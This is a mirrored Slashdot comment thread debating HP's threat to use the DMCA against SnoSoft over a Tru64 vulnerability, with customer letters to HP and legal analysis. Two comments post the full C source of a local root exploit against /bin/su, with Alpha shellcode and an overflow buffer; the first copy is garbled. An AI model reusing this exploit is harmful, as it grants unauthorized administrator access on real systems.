Slashdot Mirror
HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
Wouldn't this be similar to M$ deciding to sue virus writers for exposing security flaws in Windows? It's awful that companies have decided to start prosecuting anything, even when people are just trying to help. It is ending the hobbyist mentality that helped produce such quick innovation over the last thirty-some years.
Simply linking to the source code, like they are could get them into trouble, could it not?
http://deepmagic.securify.org.uk:8080/su.c
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
It appears that Mr. Ferson's current e-mail address is kent.ferson@compaq.com.
Just a suggestion...
Here's the source, baby!
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
HP should be thanking them
This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.
There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?
The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.
If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?
Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.
OK, so I'm a broken record.
Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
s/decade/bicential/
DMCA is about the cesation of the exchance of *PUBLIC IP* that happens to interact with private IP. The fact that it exists to destroy the "marketplace of ideas" that our country was partially founded on makes it reprehensable. The fact that it only affects a certain sector of this market is a nonissue, because the removal of any PUBLIC IP for the good of anything is "Un-American", and I'd even be so far-fetched as to say it's Un-Democratic.
How? Follow this example, while it is the extreme, it clearly shows where we are today. A new law about computer security is being discussed in congress, and they bring in some experts to share the current state of exploits. The sharing of that specific knowledge in order to allow a more informed decision by the congress would in itself be illegal. Not because the information is under a acute monopoly, but because that information is illegal in this country. I repeat, that information (Remeber, this information is PUBLIC IP) is *ILLEGAL IN THIS COUNTRY*.
For another example. Imagine that a diffrent law was under debate, a law that had some effect on "pirating" and "hacking", this law required a complete review of the current laws in the area, and thier usage. If this case goes to court, all of the records pertaining to the security vunerability will be secured legally, not just under the DMCA anymore. Congress would be unable to discuss the specifics of this vunerability, and make an informed decision about what new laws need passed.
In both of these situations, information that is clearly PUBLIC IP has been removed from the reach of our lawmakers, causing them to make less than perfect decisions. This is clearly a hinderance on democracy, and obtains that status by disrupting the free trade of public information. This information was deemed unacceptable to exist, and therefore it became illegal to share it. No other possible subset of information not covered under contractual/patent law is so bound in our free country, that makes this the first time in 2 centuries that censored an idea for being bad to a pattent holder. (ed: sorry weak tie there, couldn't think of a better one)
I believe I have upheld my value of the marketplace of ideas, and shown that by limiting democracy a free marketplace is unable to exist.
I live in a giant bucket.
The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge free of speech or of the press.
"The only law shalt be maximixe your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. The is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.
I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.
Search 2010 Gen Con events
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
Hey!
1 - US takes up capitalism.
2 - US fucks up capitalism with personal greed (or human nature, if you're that way inclined)
3 - people blame US for perverting capitalism
OK, now that's fine, I have no problem with that, BUT:
1 - Russia takes up communism
2 - Russia fucks up communism (or human nature, if you're that way inclined)
3 - US blames RUSSIA and RUSSIANS who are EVIL FUCKING COMMUNISTS and bla bla bla, and put out screeds and screeds of propoganda, to the point where people in the US *STILL* point at Russia to say "communism doesn't work".
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.
Thanks
Bruce
Bruce Perens.
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
Bruce
Bruce Perens.
#include <stdio.h>
/* 0x140010401 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
- oakbox
Not just answers, the correct questions.
Bruce,
I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.
I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.
As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated, the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.
However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on it's head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are explioting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.
Regardless of the events leading to Mr. Ferson's letter to SnoSoft HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breech of contract it is a matter for civil courts.
Aaron Schneider
Manager, Information Technology
Fabutan Sun Tan Studios
Schneider@fabutan.com
Just to show that I put my money where my mouth is, and the possibilty that from leading by example others will follow, here's the letter I wrote to the HP CEO (it may never actually get read, and may get ignored, but at least I tried :)
"First of all, I'd like to say that my product experience with HP and Compaq products has varied. Over all, Compaq products leave a lot to be desired, and though I like and used to recommend HP printers and other peripherals to clients, their reliance upon specific Microsoft software for installation is rather maddening.
Recently it has come to my attention that HP is in some fashion using the DMCA to suppress the reporting of valid security holes in some of its software. As a computer and security professional of over 24 years, I must say that this policy, as well as the DMCA itself, is severely flawed. A customer has a right to know what they are purchasing and in this case they have the right to know if their data is secure. They also have the right to make certain it is secure by any means possible. As a company providing important software (and hardware) to customers, not the least of which are large corporations, you have an obligation to see to it that the software and hardware you sell them is secure, to the best of your abilities. This obligation must not be thrown aside in a pitiful attempt to protect IP rights (or whatever HP is attempting to protect) and put your customers at risk.
In addition, this type of stance will only hurt HP in the long run, and make HP more of a target for hate and discontent in the PC market. Because of this announcement, I have removed HP from my list of recommended companies and products, as I'm sure many others will as well.
The DMCA should never have been allowed to pass, as it has only come to hurt the digital industry worldwide, including the portions that large corporations such as yours bank upon. To date, the DMCA and other such laws governing digital media have only been used to suppress the rights of certain individuals, hamper innovation, and slow technological advances to a crawl. In the future, such poorly thought out laws will further damage the industry and assist in the decline of the US and worldwide economy.
Companies that support these types of laws are not helping themselves, but only hurting themselves. After all, even large corporations such as HP are consumers and must, in the end, abide by the same laws as the consumer.
I urge you to take the correct and responsible stance of supporting public knowledge of security flaws and fixing any and all those that your products may have. By suppressing such information, you only put your customers at greater risk because by doing so only those who wish to do harm with the information will have it. Those who wish to help secure systems will not, and those that are subject to the attacks will lose billions in lost time and data. As a security professional formerly with a large corporation, I was constantly under the gun to keep our systems secure. If not for the information freely available to me through public venues, my job would have been an impossible one. My company had over 11,000 systems on public networks. Every one of these had to be secure from crackers (also known as a "malicious hacker", which is the REAL term for the media word "hacker"). It was the responsibility of an entire team of people to keep track of current security holes and make sure they were fixed on ALL systems before the crackers could use them. In many cases, the exploits were never reported to us by the software mfg., but by someone unrelated party when they posted the exploit to a public web site. In some cases where we actually found the exploit, and reported them to the mfg., we were ignored until we were forced to report it to the public. Once we had reported it, it did nothing for the companies in question but cause hate and distrust from their customers.
So you see, you can't have your cake and eat it too. You either must take the responsibility for your product up front and honestly, or reap the consequences of your inaction and attempts at hiding (or whatever it is) later. I often feel that lawyers need to be kept out of technological discussions as most of them have no clue in the area. I would be willing to bet, and in fact I have seen evidence of this, that the reason most laws such as the DMCA are passed are due to the number of people in and out of congress who really know nothing about technology. it is the responsibility of those of us who are in the know, to educate those who are not as to what should be done and why. Unfortunately, most of us are either not in a high enough position (e.g. - the CEO of a large corporation) to make our voices heard, don't care to take the responsibility (and instead sit around and bitch about stupid laws), or are in a position to make a statement but have a specific stake in the passage of said laws.
I would also urge you to take a stance against all such repressive laws regarding technology. Yes, there are legitimate concerns of copyright infringement, piracy, etc., but there are already laws to deal with these issues. There is also something called "fair use", which includes the right to reverse engineer for educational purposes, edification, personal use, and to innovate. We need to see that these laws are enforced properly, and get away from treating the digital realm as if it is of a completely different universe.
It is a small minority in the digital world that actually steal copyrighted material, and if the suppressive laws continue to roll, that minority will quickly become a majority. Most that actually steal only do it because they are priced right out of the precious markets that the large corporations are trying so hard to protect. As if making several billion a year is not enough, the prices for such products MUST be raised and we MUST be forced to pay for every second of their use.
PGA
--
Paul G. Allen
Owner, Sr. Engineer, Security Specialist
Random Logic/Dream Park
www.randomlogic.com"
PGA
Upon quickly reviewing the DMCA again, I have found that HP probably has no case whatsoever. The DMCA specifically allows Security Testing and information publication.
Section 1201(c) states that the DMCA does not circumvent Fair Use.
Section 1201(f) allows Reverse Engineering.
Section 1201(g) allows Encryption Research.
Section 1201(j) allows for Security Testing
Several sections allow publishing information.
I see no references to exceptions for viruses, trojans, worms, etc. written for the purposes of testing and exposing security flaws. In fact, such software seems to be PROTECTED under the DMCA.
So, I say to HP and all others trying to use the DMCA in this fashion: KMA!!
Even though the DMCA does NOT prohibit reverse engineering of anything, it has been INTERPRETED in just that way. There are three types of law: the written law, the interpreted law, and case law. To date, the DMCA has not really been used to protect against illegal use of copyrighted material. Instead it has been used to prohibit perfectly legal use of material. As written, the DMCA doesn't prohibit Fair Use and reverse engineering under existing law. As INTERPRETED, at least to date, it does.
This is one big problem with laws such as this. It's not necessarily the written law that's bad, it's the way it's interpreted. Some laws are written so vague that once argued in court, there is a chance that a judge (or jury) will interpret the law incorrectly. This then leads to case law which is later used in support of further rulings on the incorrectly interpreted written law. Some laws are purposefully written poorly so as to make it easily passed and then interpreted to mean something different, or something skewed, from what those who passed it were thinking.
Often laws are used against those who lack the understanding of said law, and used in a venue that may also lack such understanding, in order to dupe the defendant into submission. I've had this tried on me many times (and most people who've ever gotten a traffic ticket, gone to a family court in CA, or have had to deal with other courts) have as well. I am one who does not take even what my own lawyer has to say for granted. I am one who wants to see the text of the law, all references, and who does his own research.
IANAL, but I am educated and know how to read quite well, and I've spent enough time in court and with lawyers to have done some research into the law as a whole. I've also read the DMCA and copyright law. Apparently (IMHO) either someone at HP hasn't, or they're hoping others haven't.
PGA
--
Paul G. Allen
Owner, Sr. Engineer, Security Specialist
Random Logic/Dream Park
www.randomlogic.com